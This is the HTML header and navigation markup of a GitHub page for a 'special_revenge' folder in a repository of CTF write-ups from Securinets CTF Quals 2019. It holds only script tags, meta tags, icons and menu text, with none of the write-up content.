<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="EAE6:8CC1:157DF437:161EE307:64122508" data-pjax-transient="true"/><meta name="html-safe-nonce" content="05c6cd8167bd0cbd37119be94e59857f1ff621c9726ba228761e9c3064b837fc" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFQUU2OjhDQzE6MTU3REY0Mzc6MTYxRUUzMDc6NjQxMjI1MDgiLCJ2aXNpdG9yX2lkIjoiNDg3MTUwNzkwNjMwOTI2ODc0NCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="6b189c6eb02230d25e083a99d84a5f1ac9206999975fdbd8cb50242058a15a3a" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:102334842" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/863692b7d1fafc9d284ec0be60dc600f500cbcd2ad5ac766424bb7647f208db7/AnisBoss/CTFs" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs" /><meta name="twitter:description" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs" /> <meta property="og:image" content="https://opengraph.githubassets.com/863692b7d1fafc9d284ec0be60dc600f500cbcd2ad5ac766424bb7647f208db7/AnisBoss/CTFs" /><meta property="og:image:alt" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs" /><meta property="og:url" content="https://github.com/AnisBoss/CTFs" /><meta property="og:description" content="This repo contains some writeups made by me during multiples CTFs. - CTFs/Securinets-CTF-QUALS-2019/special_revenge at master · AnisBoss/CTFs" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/AnisBoss/CTFs git https://github.com/AnisBoss/CTFs.git">
<meta name="octolytics-dimension-user_id" content="11429289" /><meta name="octolytics-dimension-user_login" content="AnisBoss" /><meta name="octolytics-dimension-repository_id" content="102334842" /><meta name="octolytics-dimension-repository_nwo" content="AnisBoss/CTFs" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="102334842" /><meta name="octolytics-dimension-repository_network_root_nwo" content="AnisBoss/CTFs" />
<link rel="canonical" href="https://github.com/AnisBoss/CTFs/tree/master/Securinets-CTF-QUALS-2019/special_revenge" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
